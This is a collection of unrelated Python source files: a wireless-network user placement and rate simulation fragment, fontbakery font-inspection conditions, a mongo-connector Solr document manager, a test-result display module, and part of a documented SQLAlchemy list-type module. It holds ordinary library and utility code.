(1) loc_x(center) (2) loc_y(center) (3) which cell user is in (4) user mobility type
user mobility type is divided into 3 categories: low, medium and high. Low mobility users takes 70% of all,
while medium and high takes 20% and 10%.
:return: user: (1) loc_x(center) (2) loc_y(center) (3) which cell user is in (4) user mobility type
"""
while True:
user_x_tmp = np.random.randint(-40, -20, size=NUM_USER, dtype='int')
user_y_tmp = np.random.randint(-40, -20, size=NUM_USER, dtype='int')
if np.abs(user_x_tmp)<WINDOW_WIDTH/2 and np.abs(user_y_tmp)<WINDOW_WIDTH/2:#np.abs(user_x_tmp) < np.sqrt(3)/2.0 * outer_radius and (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) < outer_radius: #and (np.abs(user_x_tmp) > np.sqrt(3)/2.0*inner_radius or (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) > inner_radius):
user_x = user_x_tmp
user_y = user_y_tmp
break
self.users = np.hstack((user_x, user_y))
self.rates = get_rate_percell(self.users, cells)
self.serve_cell_id= np.argmax(self.rates)
self.last_serve_cell_id = np.random.randint(Num_CELL)
def get_rate_percell(users, cells):
"""
get the rates of the user in all the cells if this user connects to the cell. return the array "rate" to represent the rate in the cells
"""
channels_square = np.random.normal(0,1, Num_CELL) # the fast fading from the user to all the cells
norm_distance = np.zeros(Num_CELL)
shadow_fading = np.random.lognormal(mean=0,sigma=0.8,size=Num_CELL)
for num in cell_id:
# print(num)
# print (cells[num][0] - users[0]) ** 2
# print (cells[num][1] - users[1]) ** 2
# print np.sqrt((cells[num][0] - users[0]) ** 2 + (cells[num][1] - users[1]) ** 2) * resolution / 20.0
norm_distance[num] = np.sqrt((cells[num][0] - users[0]) ** 2.0 + (cells[num][1] - users[1]) ** 2) * resolution# calculate the distance between user and each base station
large_scale = 10**((-36.7 * np.log10(norm_distance*10**-3)-149.5+shadow_fading)/10)#+10**-8
snr = channels_square**2 * large_scale # assume that "p * 10^-12/noise_power = 1" is feasible
rates = np.log2(1 + 10**7*snr)
return rates
|
|
import os
from typing import List
from collections import Counter
from fontbakery.callable import condition
# used to inform get_module_profile whether and how to create a profile
from fontbakery.fonts_profile import profile_factory # NOQA pylint: disable=unused-import,cyclic-import
@condition
def ttFont(font):
from fontTools.ttLib import TTFont
return TTFont(font)
@condition
def is_ttf(ttFont):
return 'glyf' in ttFont
@condition
def are_ttf(ttFonts):
for f in ttFonts:
if not is_ttf(f):
return False
# otherwise:
return True
@condition
def is_cff(ttFont):
return 'CFF ' in ttFont
@condition
def is_cff2(ttFont):
return 'CFF2' in ttFont
@condition
def variable_font_filename(ttFont):
from fontbakery.utils import get_name_entry_strings
from fontbakery.constants import (MacStyle,
NameID)
familynames = get_name_entry_strings(ttFont, NameID.FONT_FAMILY_NAME)
typo_familynames = get_name_entry_strings(ttFont, NameID.TYPOGRAPHIC_FAMILY_NAME)
if familynames == []:
return None
familyname = typo_familynames[0] if typo_familynames else familynames[0]
familyname = "".join(familyname.split(' ')) #remove spaces
if bool(ttFont["head"].macStyle & MacStyle.ITALIC):
familyname+="-Italic"
tags = ttFont["fvar"].axes
tags = list(map(lambda t: t.axisTag, tags))
tags.sort()
tags = "[{}]".format(",".join(tags))
return f"{familyname}{tags}.ttf"
@condition
def family_directory(font):
"""Get the path of font project directory."""
if font:
dirname = os.path.dirname(font)
if dirname == '':
dirname = '.'
return dirname
@condition
def sibling_directories(family_directory):
"""
Given a directory, this function tries to figure out where else in the filesystem
other related "sibling" families might be located.
This is guesswork and may not be able to find font files in other folders not yet
covered by this routine. We may improve this in the future by adding other
smarter filesystem lookup procedures or even by letting the user feed explicit
sibling family paths.
This function returs a list of paths to directories where related font files were detected.
"""
SIBLING_SUFFIXES = ["sans",
"sc",
"narrow",
"text",
"display",
"condensed"]
base_family_dir = family_directory
for suffix in SIBLING_SUFFIXES:
if family_directory.endswith(suffix):
candidate = family_directory[:-len(suffix)]
if os.path.isdir(candidate):
base_family_dir = candidate
break
directories = [base_family_dir]
for suffix in SIBLING_SUFFIXES:
candidate = base_family_dir + suffix
if os.path.isdir(candidate):
directories.append(candidate)
return directories
@condition
def superfamily(sibling_directories):
"""
Given a list of directories, this functions looks for font files
and returs a list of lists of the detected filepaths.
"""
result = []
for family_dir in sibling_directories:
filepaths = []
for entry in os.listdir(family_dir):
if entry[-4:] in [".otf", ".ttf"]:
filepaths.append(os.path.join(family_dir, entry))
result.append(filepaths)
return result
@condition
def superfamily_ttFonts(superfamily):
from fontTools.ttLib import TTFont
result = []
for family in superfamily:
result.append([TTFont(f) for f in family])
return result
@condition
def ligatures(ttFont):
from fontTools.ttLib.tables.otTables import LigatureSubst
all_ligatures = {}
try:
if "GSUB" in ttFont and ttFont["GSUB"].table.LookupList:
for record in ttFont["GSUB"].table.FeatureList.FeatureRecord:
if record.FeatureTag == 'liga':
for index in record.Feature.LookupListIndex:
lookup = ttFont["GSUB"].table.LookupList.Lookup[index]
for subtable in lookup.SubTable:
if isinstance(subtable, LigatureSubst):
for firstGlyph in subtable.ligatures.keys():
all_ligatures[firstGlyph] = []
for lig in subtable.ligatures[firstGlyph]:
if lig.Component not in all_ligatures[firstGlyph]:
all_ligatures[firstGlyph].append(lig.Component)
return all_ligatures
except:
return -1 # Indicate fontTools-related crash...
@condition
def ligature_glyphs(ttFont):
from fontTools.ttLib.tables.otTables import LigatureSubst
all_ligature_glyphs = []
try:
if "GSUB" in ttFont and ttFont["GSUB"].table.LookupList:
for record in ttFont["GSUB"].table.FeatureList.FeatureRecord:
if record.FeatureTag == 'liga':
for index in record.Feature.LookupListIndex:
lookup = ttFont["GSUB"].table.LookupList.Lookup[index]
for subtable in lookup.SubTable:
if isinstance(subtable, LigatureSubst):
for firstGlyph in subtable.ligatures.keys():
for lig in subtable.ligatures[firstGlyph]:
if lig.LigGlyph not in all_ligature_glyphs:
all_ligature_glyphs.append(lig.LigGlyph)
return all_ligature_glyphs
except:
return -1 # Indicate fontTools-related crash...
@condition
def glyph_metrics_stats(ttFont):
"""Returns a dict containing whether the font seems_monospaced,
what's the maximum glyph width and what's the most common width.
For a font to be considered monospaced, if at least 80% of ASCII
characters have glyphs, then at least 80% of those must have the same
width, otherwise all glyphs of printable characters must have one of
two widths or be zero-width.
"""
glyph_metrics = ttFont['hmtx'].metrics
# NOTE: `range(a, b)` includes `a` and does not include `b`.
# Here we don't include 0-31 as well as 127
# because these are control characters.
ascii_glyph_names = [ttFont.getBestCmap()[c] for c in range(32, 127)
if c in ttFont.getBestCmap()]
if len(ascii_glyph_names) > 0.8 * (127 - 32):
ascii_widths = [adv for name, (adv, lsb) in glyph_metrics.items()
if name in ascii_glyph_names and adv != 0]
ascii_width_count = Counter(ascii_widths)
ascii_most_common_width = ascii_width_count.most_common(1)[0][1]
seems_monospaced = ascii_most_common_width >= len(ascii_widths) * 0.8
else:
from fontTools import unicodedata
# Collect relevant glyphs.
relevant_glyph_names = set()
# Add character glyphs that are in one of these categories:
# Letter, Mark, Number, Punctuation, Symbol, Space_Separator.
# This excludes Line_Separator, Paragraph_Separator and Control.
for value, name in ttFont.getBestCmap().items():
if unicodedata.category(chr(value)).startswith(
("L", "M", "N", "P", "S", "Zs")
):
relevant_glyph_names.add(name)
# Remove character glyphs that are mark glyphs.
gdef = ttFont.get("GDEF")
if gdef and gdef.table.GlyphClassDef:
marks = {name
for name, c in gdef.table.GlyphClassDef.classDefs.items()
if c == 3
}
relevant_glyph_names.difference_update(marks)
widths = sorted({adv for name, (adv, lsb) in glyph_metrics.items()
if name in relevant_glyph_names and adv != 0})
seems_monospaced = len(widths) <= 2
width_max = max([adv for k, (adv, lsb) in glyph_metrics.items()])
most_common_width = Counter([g for g in glyph_metrics.values()
if g[0] != 0]).most_common(1)[0][0][0]
return {
"seems_monospaced": seems_monospaced,
"width_max": width_max,
"most_common_width": most_common_width,
}
@condition
def missing_whitespace_chars(ttFont):
from fontbakery.utils import get_glyph_name
space = get_glyph_name(ttFont, 0x0020)
nbsp = get_glyph_name(ttFont, 0x00A0)
# tab = get_glyph_name(ttFont, 0x0009)
missing = []
if space is None: missing.append("0x0020")
if nbsp is None: missing.append("0x00A0")
# fonts probably don't need an actual tab char
# if tab is None: missing.append("0x0009")
return missing
@condition
def vmetrics(ttFonts):
from fontbakery.utils import get_bounding_box
v_metrics = {"ymin": 0, "ymax": 0}
for ttFont in ttFonts:
font_ymin, font_ymax = get_bounding_box(ttFont)
v_metrics["ymin"] = min(font_ymin, v_metrics["ymin"])
v_metrics["ymax"] = max(font_ymax, v_metrics["ymax"])
return v_metrics
@condition
def is_variable_font(ttFont):
return "fvar" in ttFont.keys()
@condition
def is_not_variable_font(ttFont):
return "fvar" not in ttFont.keys()
@condition
def VFs(ttFonts):
"""Returns a list of font files which are recognized as variable fonts"""
return [ttFont for ttFont in ttFonts
if is_variable_font(ttFont)]
@condition
def slnt_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "slnt":
return axis
@condition
def opsz_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "opsz":
return axis
@condition
def ital_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "ital":
return axis
@condition
def grad_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "GRAD":
return axis
def get_instance_axis_value(ttFont, instance_name, axis_tag):
if not is_variable_font(ttFont):
return None
instance = None
for i in ttFont["fvar"].instances:
name = ttFont["name"].getDebugName(i.subfamilyNameID)
if name == instance_name:
instance = i
break
if instance:
for axis in ttFont["fvar"].axes:
if axis.axisTag == axis_tag:
return instance.coordinates[axis_tag]
@condition
def regular_wght_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "wght")
@condition
def bold_wght_coord(ttFont):
return get_instance_axis_value(ttFont, "Bold", "wght")
@condition
def regular_wdth_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "wdth")
@condition
def regular_slnt_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "slnt")
@condition
def regular_ital_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "ital")
@condition
def regular_opsz_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "opsz")
@condition
def vtt_talk_sources(ttFont) -> List[str]:
"""Return the tags of VTT source tables found in a font."""
VTT_SOURCE_TABLES = {'TSI0', 'TSI1', 'TSI2', 'TSI3', 'TSI5'}
tables_found = [tag for tag in ttFont.keys() if tag in VTT_SOURCE_TABLES]
return tables_found
@condition
def preferred_cmap(ttFont):
from fontbakery.utils import get_preferred_cmap
return get_preferred_cmap(ttFont)
@condition
def unicoderange(ttFont):
"""Get an integer bitmap representing the UnicodeRange fields in the os/2 table."""
os2 = ttFont['OS/2']
return (os2.ulUnicodeRange1 |
os2.ulUnicodeRange2 << 32 |
os2.ulUnicodeRange3 << 64 |
os2.ulUnicodeRange4 << 96)
@condition
def is_cjk_font(ttFont):
"""Test font object to confirm that it meets our definition of a CJK font file.
The definition is met if any of the following conditions are True:
1. The font has a CJK code page bit set in the OS/2 table
2. The font has a CJK Unicode range bit set in the OS/2 table
3. The font has any CJK Unicode code points defined in the cmap table
"""
from fontbakery.constants import (CJK_CODEPAGE_BITS,
CJK_UNICODE_RANGE_BITS,
CJK_UNICODE_RANGES)
os2 = ttFont["OS/2"]
# OS/2 code page checks
for _, bit in CJK_CODEPAGE_BITS.items():
if os2.ulCodePageRange1 & (1 << bit):
return True
# OS/2 Unicode range checks
for _, bit in CJK_UNICODE_RANGE_BITS.items():
if bit in range(0, 32):
if os2.ulUnicodeRange1 & (1 << bit):
return True
elif bit in range(32, 64):
if os2.ulUnicodeRange2 & (1 << (bit-32)):
return True
elif bit in range(64, 96):
if os2.ulUnicodeRange3 & (1 << (bit-64)):
return True
# defined CJK Unicode code point in cmap table checks
cmap = ttFont.getBestCmap()
for unicode_range in CJK_UNICODE_RANGES:
for x in range(unicode_range[0], unicode_range[1]+1):
if int(x) in cmap:
return True
# default, return False if the above checks did not identify a CJK font
return False
@condition
def get_cjk_glyphs(ttFont):
"""Return all glyphs which belong to a CJK unicode block"""
from fontbakery.constants import CJK_UNICODE_RANGES
results = []
cjk_unicodes = set()
for start, end in CJK_UNICODE_RANGES:
cjk_unicodes |= set(u for u in range(start, end+1))
for uni, glyph_name in ttFont.getBestCmap().items():
if uni in cjk_unicodes:
results.append(glyph_name)
return results
@condition
def typo_metrics_enabled(ttFont):
return ttFont['OS/2'].fsSelection & 0b10000000 > 0
@condition
def is_indic_font(ttFont):
INDIC_FONT_DETECTION_CODEPOINTS = [
0x0988, # Bengali
0x0908, # Devanagari
0x0A88, # Gujarati
0x0A08, # Gurmukhi
0x0D08, # Kannada
0x0B08, # Malayalam
0xABC8, # Meetei Mayek
0x1C58, # OlChiki
0x0B08, # Oriya
0x0B88, # Tamil
0x0C08, # Telugu
]
font_codepoints = ttFont['cmap'].getBestCmap().keys()
for codepoint in INDIC_FONT_DETECTION_CODEPOINTS:
if codepoint in font_codepoints:
return True
#otherwise:
return False
@condition
def is_italic(ttFont):
return (
ttFont["OS/2"].fsSelection & 0x1
or ("post" in ttFont and ttFont["post"].italicAngle)
or ttFont["head"].macStyle & 0x2
)
@condition
def is_not_italic(ttFont):
return not is_italic(ttFont)
|
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Receives documents from the oplog worker threads and indexes them
into the backend.
This file is a document manager for the Solr search engine, but the intent
is that this file can be used as an example to add on different backends.
To extend this to other systems, simply implement the exact same class and
replace the method definitions with API calls for the desired backend.
"""
import re
import json
import bson.json_util as bsjson
from pysolr import Solr, SolrError
from mongo_connector import errors
from mongo_connector.constants import (DEFAULT_COMMIT_INTERVAL,
DEFAULT_MAX_BULK)
from mongo_connector.util import retry_until_ok
from mongo_connector.doc_managers import DocManagerBase, exception_wrapper
# pysolr only has 1 exception: SolrError
wrap_exceptions = exception_wrapper({
SolrError: errors.OperationFailed})
ADMIN_URL = 'admin/luke?show=schema&wt=json'
decoder = json.JSONDecoder()
class DocManager(DocManagerBase):
"""The DocManager class creates a connection to the backend engine and
adds/removes documents, and in the case of rollback, searches for them.
The reason for storing id/doc pairs as opposed to doc's is so that multiple
updates to the same doc reflect the most up to date version as opposed to
multiple, slightly different versions of a doc.
"""
def __init__(self, url, auto_commit_interval=DEFAULT_COMMIT_INTERVAL,
unique_key='_id', chunk_size=DEFAULT_MAX_BULK, **kwargs):
"""Verify Solr URL and establish a connection.
"""
self.solr = Solr(url)
self.unique_key = unique_key
# pysolr does things in milliseconds
if auto_commit_interval is not None:
self.auto_commit_interval = auto_commit_interval * 1000
else:
self.auto_commit_interval = None
self.chunk_size = chunk_size
self.field_list = []
self._build_fields()
def _parse_fields(self, result, field_name):
""" If Schema access, parse fields and build respective lists
"""
field_list = []
for key, value in result.get('schema', {}).get(field_name, {}).items():
if key not in field_list:
field_list.append(key)
return field_list
@wrap_exceptions
def _build_fields(self):
""" Builds a list of valid fields
"""
declared_fields = self.solr._send_request('get', ADMIN_URL)
result = decoder.decode(declared_fields)
self.field_list = self._parse_fields(result, 'fields')
# Build regular expressions to match dynamic fields.
# dynamic field names may have exactly one wildcard, either at
# the beginning or the end of the name
self._dynamic_field_regexes = []
for wc_pattern in self._parse_fields(result, 'dynamicFields'):
if wc_pattern[0] == "*":
self._dynamic_field_regexes.append(
re.compile(".*%s\Z" % wc_pattern[1:]))
elif wc_pattern[-1] == "*":
self._dynamic_field_regexes.append(
re.compile("\A%s.*" % wc_pattern[:-1]))
def _clean_doc(self, doc):
"""Reformats the given document before insertion into Solr.
This method reformats the document in the following ways:
- removes extraneous fields that aren't defined in schema.xml
- unwinds arrays in order to find and later flatten sub-documents
- flattens the document so that there are no sub-documents, and every
value is associated with its dot-separated path of keys
An example:
{"a": 2,
"b": {
"c": {
"d": 5
}
},
"e": [6, 7, 8]
}
becomes:
{"a": 2, "b.c.d": 5, "e.0": 6, "e.1": 7, "e.2": 8}
"""
# SOLR cannot index fields within sub-documents, so flatten documents
# with the dot-separated path to each value as the respective key
def flattened(doc):
def flattened_kernel(doc, path):
for k, v in doc.items():
path.append(k)
if isinstance(v, dict):
for inner_k, inner_v in flattened_kernel(v, path):
yield inner_k, inner_v
elif isinstance(v, list):
for li, lv in enumerate(v):
path.append(str(li))
if isinstance(lv, dict):
for dk, dv in flattened_kernel(lv, path):
yield dk, dv
else:
yield ".".join(path), lv
path.pop()
else:
yield ".".join(path), v
path.pop()
return dict(flattened_kernel(doc, []))
# Translate the _id field to whatever unique key we're using
doc[self.unique_key] = doc["_id"]
flat_doc = flattened(doc)
# Only include fields that are explicitly provided in the
# schema or match one of the dynamic field patterns, if
# we were able to retrieve the schema
if len(self.field_list) + len(self._dynamic_field_regexes) > 0:
def include_field(field):
return field in self.field_list or any(
regex.match(field) for regex in self._dynamic_field_regexes
)
return dict((k, v) for k, v in flat_doc.items() if include_field(k))
return flat_doc
def stop(self):
""" Stops the instance
"""
pass
def apply_update(self, doc, update_spec):
"""Override DocManagerBase.apply_update to have flat documents."""
# Replace a whole document
if not '$set' in update_spec and not '$unset' in update_spec:
# update spec contains the new document
update_spec['_ts'] = doc['_ts']
update_spec['ns'] = doc['ns']
return update_spec
for to_set in update_spec.get("$set", []):
value = update_spec['$set'][to_set]
# Find dotted-path to the value, remove that key from doc, then
# put value at key:
keys_to_pop = []
for key in doc:
if key.startswith(to_set):
if key == to_set or key[len(to_set)] == '.':
keys_to_pop.append(key)
for key in keys_to_pop:
doc.pop(key)
doc[to_set] = value
for to_unset in update_spec.get("$unset", []):
doc.pop(to_unset)
return doc
@wrap_exceptions
def update(self, doc, update_spec):
"""Apply updates given in update_spec to the document whose id
matches that of doc.
"""
query = "%s:%s" % (self.unique_key, str(doc['_id']))
results = self.solr.search(query)
if not len(results):
# Document may not be retrievable yet
self.commit()
results = self.solr.search(query)
# Results is an iterable containing only 1 result
for doc in results:
updated = self.apply_update(doc, update_spec)
# A _version_ of 0 will always apply the update
updated['_version_'] = 0
self.upsert(updated)
return updated
@wrap_exceptions
def upsert(self, doc):
"""Update or insert a document into Solr
This method should call whatever add/insert/update method exists for
the backend engine and add the document in there. The input will
always be one mongo document, represented as a Python dictionary.
"""
if self.auto_commit_interval is not None:
self.solr.add([self._clean_doc(doc)],
commit=(self.auto_commit_interval == 0),
commitWithin=str(self.auto_commit_interval))
else:
self.solr.add([self._clean_doc(doc)], commit=False)
@wrap_exceptions
def bulk_upsert(self, docs):
"""Update or insert multiple documents into Solr
docs may be any iterable
"""
if self.auto_commit_interval is not None:
add_kwargs = {
"commit": (self.auto_commit_interval == 0),
"commitWithin": self.auto_commit_interval
}
else:
add_kwargs = {"commit": False}
cleaned = (self._clean_doc(d) for d in docs)
if self.chunk_size > 0:
batch = list(next(cleaned) for i in range(self.chunk_size))
while batch:
self.solr.add(batch, **add_kwargs)
batch = list(next(cleaned)
for i in range(self.chunk_size))
else:
self.solr.add(cleaned, **add_kwargs)
@wrap_exceptions
def remove(self, doc):
"""Removes documents from Solr
The input is a python dictionary that represents a mongo document.
"""
self.solr.delete(id=str(doc[self.unique_key]),
commit=(self.auto_commit_interval == 0))
@wrap_exceptions
def _remove(self):
"""Removes everything
"""
self.solr.delete(q='*:*', commit=(self.auto_commit_interval == 0))
@wrap_exceptions
def search(self, start_ts, end_ts):
"""Called to query Solr for documents in a time range.
"""
query = '_ts: [%s TO %s]' % (start_ts, end_ts)
return self.solr.search(query, rows=100000000)
@wrap_exceptions
def _search(self, query):
"""For test purposes only. Performs search on Solr with given query
Does not have to be implemented.
"""
return self.solr.search(query, rows=200)
def commit(self):
"""This function is used to force a commit.
"""
retry_until_ok(self.solr.commit)
@wrap_exceptions
def get_last_doc(self):
"""Returns the last document stored in the Solr engine.
"""
#search everything, sort by descending timestamp, return 1 row
try:
result = self.solr.search('*:*', sort='_ts desc', rows=1)
except ValueError:
return None
if len(result) == 0:
return None
return result.docs[0]
|
|
"""
The display module.
"""
from jasper.utility import extract_traceback
from termcolor import colored
import textwrap
import colorama
import sys
class Display(object):
"""
The class responsible for displaying the results of a suites, features, scenarios, and steps.
"""
def __init__(self, force_ansi=True, verbosity_level=0):
"""
Initialize a new Display object.
:param force_ansi: Flag for whether or not to force the display to use ansi escape sequences. default is True.
:param verbosity_level: The verbosity level for the display to use. default is 0, maxes out at 2.
"""
self.display_string = ''
self.indentation_level = 0
self.verbosity_level = verbosity_level
self.colored = True
self.force_ansi = force_ansi
colorama.deinit()
def display(self):
"""
Print the prepared data to the screen.
"""
if sys.platform == 'win32' and not self.force_ansi:
colorama.init()
print(self.display_string)
colorama.deinit()
def cyan(self, text):
"""
Color some text cyan.
If the displays color is disabled the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'cyan') if self.colored else text
def yellow(self, text):
"""
Color some text yellow.
If the displays color is disabled the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'yellow') if self.colored else text
def red(self, text):
"""
Color some text red.
If the displays color is disabled the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'red') if self.colored else text
def grey(self, text):
"""
Color some text grey.
If the displays color is disabled the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'white') if self.colored else text
@staticmethod
def indent(text, amount):
"""
Indent some text by the given amount.
:param text: The text to indent.
:param amount: The amount of spaces to indent the text with.
:return: The indented text.
"""
return textwrap.indent(text, ' ' * amount)
def __push_to_display(self, display_string):
self.display_string += self.indent(display_string + '\n', self.indentation_level)
def prepare_suite(self, suite):
"""
Prepare a Suite object to be displayed.
:param suite: The Suite to prepare.
"""
color = self.cyan if suite.passed else self.red
if not suite.passed or self.verbosity_level > 0:
for feature in suite.features:
self.prepare_feature(feature)
self.__push_to_display(self.prepare_border(color, 150))
self.prepare_statistics(suite)
self.__push_to_display(self.prepare_border(color, 150))
def prepare_feature(self, feature):
"""
Prepare a Feature object to be displayed.
:param feature: The Feature to prepare.
"""
if not feature.passed or self.verbosity_level > 0:
color = self.cyan if feature.passed else self.red
self.__push_to_display(self.prepare_border(color, 150))
self.__push_to_display(color(f'Feature: {feature.description}'))
self.indentation_level += 4
if not feature.passed or self.verbosity_level > 1:
for before in feature.before_all:
self.prepare_step(before, 'BeforeAll')
for after in feature.after_all:
self.prepare_step(after, 'AfterAll')
for before in feature.before_each:
self.prepare_step(before, 'BeforeEach')
for after in feature.after_each:
self.prepare_step(after, 'AfterEach')
for scenario in feature.scenarios:
self.prepare_scenario(scenario)
if feature.exception is not None:
self.prepare_exception(feature.exception)
self.indentation_level -= 4
self.__push_to_display(self.prepare_border(color, 150))
def prepare_scenario(self, scenario):
"""
Prepare a Scenario object to be displayed.
:param scenario: The Scenario to prepare.
"""
if not scenario.passed or self.verbosity_level > 0:
if not scenario.ran:
color = self.grey
elif scenario.passed:
color = self.cyan
else:
color = self.red
self.__push_to_display(color(f'Scenario: {scenario.description}'))
if not scenario.passed or self.verbosity_level > 1:
self.indentation_level += 4
for before in scenario.before_all:
self.prepare_step(before, 'BeforeAll')
for after in scenario.after_all:
self.prepare_step(after, 'AfterAll')
for before in scenario.before_each:
self.prepare_step(before, 'BeforeEach')
for after in scenario.after_each:
self.prepare_step(after, 'AfterEach')
for index, given in enumerate(scenario.given):
self.prepare_step(given, 'Given') if index == 0 else self.prepare_step(given, 'And')
for index, when in enumerate(scenario.when):
self.prepare_step(when, 'When') if index == 0 else self.prepare_step(when, 'And')
for index, then in enumerate(scenario.then):
self.prepare_step(then, 'Then') if index == 0 else self.prepare_step(then, 'And')
if scenario.exception is not None:
self.prepare_exception(scenario.exception)
self.indentation_level -= 4
def prepare_step(self, step, step_name):
"""
Prepare a Step object to be displayed.
:param step: The Step to prepare.
:param step_name: A name to represent the step with.
"""
if not step.ran:
color = self.grey
elif step.passed:
color = self.cyan
else:
color = self.red
self.__push_to_display(color(f"{step_name}: "
f"{step.function.__name__} {step.kwargs if step.kwargs else ''}"))
def prepare_exception(self, exception):
"""
Prepare an exception to be displayed.
:param exception: The exception to prepare.
"""
if str(exception):
exception_string = f'{str(exception)}\n'
else:
exception_string = f'{exception.__class__.__name__}\n'
traceback_string = f'{extract_traceback(exception)}'
self.__push_to_display(self.yellow((exception_string + traceback_string).rstrip()))
def prepare_border(self, color, length):
"""
Prepare a border to be displayed.
:param color: The color to give the border.
:param length: The length of the border.
"""
return color('=' * length)
def prepare_statistics(self, suite):
"""
Prepare the statistics of a Suite object to be displayed.
:param suite: The Suite object to prepare the statistics for.
"""
color = self.cyan if suite.passed else self.red
self.__push_to_display(
color(
f'{suite.num_features_passed} Features passed, {suite.num_features_failed} failed.\n'
f'{suite.num_scenarios_passed} Scenarios passed, {suite.num_scenarios_failed} failed.'
)
)
|
|
#!/usr/bin/env python
# cardinal_pythonlib/sqlalchemy/list_types.py
"""
===============================================================================
Original code copyright (C) 2009-2021 Rudolf Cardinal (rudolf@pobox.com).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**SQLAlchemy type classes to store different kinds of lists in a database.**
"""
import csv
from io import StringIO
from typing import List, Optional
from cardinal_pythonlib.logs import get_brace_style_log_with_null_handler
from sqlalchemy.engine.interfaces import Dialect
from sqlalchemy.sql.sqltypes import Text, UnicodeText
from sqlalchemy.sql.type_api import TypeDecorator
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# StringListType
# =============================================================================
class StringListType(TypeDecorator):
r"""
Store a list of strings as CSV.
(Rather less arbitrary in its encoding requirements than e.g.
https://sqlalchemy-utils.readthedocs.io/en/latest/_modules/sqlalchemy_utils/types/scalar_list.html#ScalarListType.)
- 2019-01-01: removed trailing ``\r\n`` (via ``lineterminator=""``).
Some related test code:
.. code-block:: python
import csv
from io import StringIO
pythonlist = [None, 1, "string", "commas, within string", "line 1\nline2"]
output_1 = StringIO()
wr_1 = csv.writer(output_1, quoting=csv.QUOTE_ALL) # appends '\r\n'
wr_1.writerow(pythonlist)
csvstring_1 = output_1.getvalue()
print(repr(csvstring_1))
backtopython_1 = list(csv.reader([csvstring_1]))[0]
print(repr(backtopython_1))
output_2 = StringIO()
wr_2 = csv.writer(output_2, quoting=csv.QUOTE_ALL, lineterminator="")
wr_2.writerow(pythonlist)
csvstring_2 = output_2.getvalue()
print(repr(csvstring_2))
backtopython_2 = list(csv.reader([csvstring_2]))[0]
print(repr(backtopython_2))
assert len(csvstring_1) > len(csvstring_2)
assert backtopython_1 == backtopython_2
So:
- The newline terminator is obviously unnecessary for something that will
always be a single CSV line.
- Eliminating it saves two bytes and adds clarity in the database
representation.
- Eliminating it keeps the system back-compatible, since the reader
happily reads things without the line terminator.
- **NOTE** in particular that this does not behave completely like a plain
Python list on the Python side, as follows.
- When an ORM object is created, the default value on the Python side is
``None``.
- The SQLAlchemy ``default`` option is invoked at ``INSERT``, not at ORM
object creation; see
https://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column.params.default.
- The SQLAlchemy ``server_default`` is the DDL ``DEFAULT`` value, not a
Python default.
- On database load, everything is fine (as ``process_result_value`` will
be called, which can translate a database ``NULL`` to a Python ``[]``).
- So that means that **if you want the field to be a list rather than
None from the outset,** you must set it to ``[]`` from ``__init__()``.
- Secondly, SQLAlchemy makes its columns behave in a special way **upon
assignment**. So, in particular, ``mylist.append(value)`` will not itself
mark the field as "dirty" and in need of writing to the database.
- Internally, support we define (on the class) ``mycol =
Column(Integer)``, and then create an instance via ``instance =
cls()``.
- Then ``cls.mycol`` will actually be of type
:class:`sqlalchemy.orm.attributes.InstrumentedAttribute`, and
``instance.mycol`` will be of type ``int`` (or ``NoneType`` if it's
``None``).
.. code-block:: python
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql.schema import Column
from sqlalchemy.sql.sqltypes import Integer
Base = declarative_base()
class MyClass(Base):
__tablename__ = "mytable"
pk = Column(Integer, primary_key=True)
mycol = Column(Integer)
instance = MyClass()
type(MyClass.pk) # <class 'sqlalchemy.orm.attributes.InstrumentedAttribute'>
type(instance.pk) # <class 'NoneType'>
- The class :class:`sqlalchemy.orm.attributes.InstrumentedAttribute`
implements :meth:`__set__`, :meth:`__delete__`, and :meth:`__get__`.
This means that when you write ``instance.mycol = 5``, it calls the
``__set__()`` function; see
https://docs.python.org/3.7/howto/descriptor.html.
- So, for a list (e.g. ``mylist = Column(StringListType)``, if you write
``mylist = [value1, value2]``, it will call the appropriate
``__set__()`` function and mark the field as "dirty" (see e.g.
:meth:`sqlalchemy.orm.attributes.ScalarAttributeImpl.set`). **But** if
``mylist`` is already a list and you write ``mylist.append(value)``,
the ``__set__()`` function won't be called.
- If you haven't yet written the instance to the database, this doesn't
matter; "new" values are considered dirty and are written to the
database fine. But if you (a) create, (b) save, and then (c) append to
a list, the change won't be noticed. Since SQLAlchemy can save objects
for you as soon as another object needs to know it's PK, the fact that
(b) has happened may not be obvious.
- Therefore, in short, **beware append() and use assignment** for these
